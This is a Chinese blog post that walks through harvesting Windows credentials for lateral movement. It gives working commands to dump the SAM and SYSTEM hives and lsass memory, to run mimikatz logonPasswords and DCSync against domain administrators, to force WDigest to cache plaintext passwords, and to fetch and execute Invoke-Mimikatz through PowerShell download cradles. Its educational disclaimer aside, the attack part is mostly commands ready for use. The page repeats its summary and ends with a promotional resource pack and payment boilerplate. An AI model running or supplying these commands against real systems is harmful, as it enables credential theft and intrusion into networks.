内网横向渗透之密码搜集

一、前言

由于本人是第一次写文章,算是对自己的知识进行梳理也算是炒冷饭了,欢迎大家的批评与建议。

本文仅用于技术讨论与研究,对于文中所有的工具以及命令,都是本人自行搭建的环境进行测试的。文中使用的技术仅用于学习教育目的,如果文中出现的技术用于其他任何目的及目标,作者概不负责。

二、常见的方法

1.抓取本地SAM文件中的密码 从注册表中导出

reg save HKLM\SYSTEM sys.hiv #获取SYSTEM注册表信息,导出为sys.hiv文件

reg save HKLM\SAM sam.hiv
#获取SAM注册表信息,导出为sam.hiv文件1614067076_6034b5848d40e66001ab5.png!small?1614067076832

2.还可以使用nihs_x0008_ng中的Invoke-NinjaCopy.ps1脚本导出

①导出SAM文件 Invoke-NinjaCopy -Path “C:\Windows\System32\con fig\SYSTEM”
-LocalDestination “C:\Windows\Temp\PowerShell-master\PowerShell-master\Invoke-
NinjaCopy\sys.hiv”

②导出SYSTEM文件 Invoke-NinjaCopy -Path “C:\Windows\System32\conf ig\SAM”
-LocalDestination “C:\Windows\Temp\PowerShell-master\PowerShell-master\Invoke-
NinjaCopy\sam.hiv”

Ninja-copy

在线加载: powershell -exec bypass “IEX (New-Object
Net.WebClient).DownloadString(‘http://ip/Invoke-NinjaCopy.ps1’);Invoke-
NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\SAM.txt;”

本地加载: powershell -exec bypass “Import-Module .\Invoke-NinjaCopy.ps1;Invoke-
NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination sam.hive”

利用empire里面的Invoke-PowerDump.ps1脚本,下载地址:
[https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-
PowerDump.ps1
](https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-
PowerDump.ps1)

从左到右依次是: 用户名 : Rid : ntlm : lm:::
Rid为500代表是管理员,504代表是guest账号等。lm跟ntlm的区别是加密方法的不同

1614071965_6034c89d7bceebc09b4c9.png!small

用mimikatz解密导出的两个文件

privilege::debug #提升权限

lsadump::sam /sam:sam.hiv /system:sys.hiv #mimikatz运行解密命令

1614072056_6034c8f8aeac5d43c10bf.png!small?16140720572611614072046_6034c8ee0f67287a6a760.png!small?1614072046487

当我们没法使用交互式的命令时可以使用下面的命令导出

powershell “IEX (New-Object
Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-
Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds”

mimikatz

privilege::debug 提升权限

sekurlsa::logonPasswords 抓取密码

mimikatz.exe “privilege::debug” “sekurlsa::logonPasswords” “exit” > pass.txt

lsadump::sam /sam:Sam.hiv /system:System.hiv 导出用户hash

使用PowerShell Mimikatz

使用Mimikatz的DCSync 远程转储Active Directory凭证提取用户帐户的密码数据: Mimikatz
“privilege::debug” "lsadump::dcsync /domain:xxx /user:dbadmin"exit

管理员用户帐户提取密码数据:

Mimikatz “privilege::debug” “lsadump::dcsync /domain:xxx /user:Administrator”
exit

使用mimikatz.exe,执行ts::multirdp允许多用户远程登录

需要说明一下的是,当系统为win10或者win2012R2以上时,默认内存缓存中禁止保存明文密码,此时可以通过修改组测表的方式抓取明文,但是需要用户重新登陆后才能抓取成功。
命令如下:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v
UseLogonCredential /t REG_DWORD /d 1 /f

当重启服务器的时候,我们重新加载mimikatz,就可以抓取密码。

1614072342_6034ca16ef1ce103e745b.png!small?1614072343612

saminside

用saminside解密导出的两个文件 打开工具saminside导入sam与system文件 如图:

1614072398_6034ca4e3536728ee4965.png!small?1614072398568

procdump+mimikatz

①把lsass进程文件拖回本地破解(因为直接上传会报杀)注意工具与目标系统位数要一致

procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp
#在目标机子执行导出为lsass.dmp,然后拖回本地

1614072445_6034ca7dc4f0f95fbc2d9.png!small?1614072446346

挂载lsass.dmp文件 sekurlsa::minidump lsass.dmp #挂载lsass.dmp

1614072461_6034ca8d86d4948146fd1.png!small?1614072461726

抓取lsass.dmp文件中的密码 log #会在目录下生成.log文件,方便查看 sekurlsa::logonpasswords
#mimikatz执行,在拖回的.dmp文件抓取密码

sqldumper+mimikatz

①首先查看lsass进程的PID tasklist /svc |findstr lsass.exe

②利用sqldumper转储 Sqldumper.exe 0 0x01100 #后面的数字是固定的,然后就会生成Sqlxxx.mdmp文件

③利用mimikatz抓取hash sekurlsa::minidump SQLDmpr0001.mdmp sekurlsa::logonPasswords

总结

希望大家多多批评指导,本人也是一个刚刚打开安全大门的弱鸡大家共同努力为网络安全添砖加瓦。

hash sekurlsa::minidump SQLDmpr0001.mdmp sekurlsa::logonPasswords

总结

希望大家多多批评指导,本人也是一个刚刚打开安全大门的弱鸡大家共同努力为网络安全添砖加瓦。

学习计划安排


我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!

如果你对网络安全入门感兴趣,那么你需要的话可以

点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值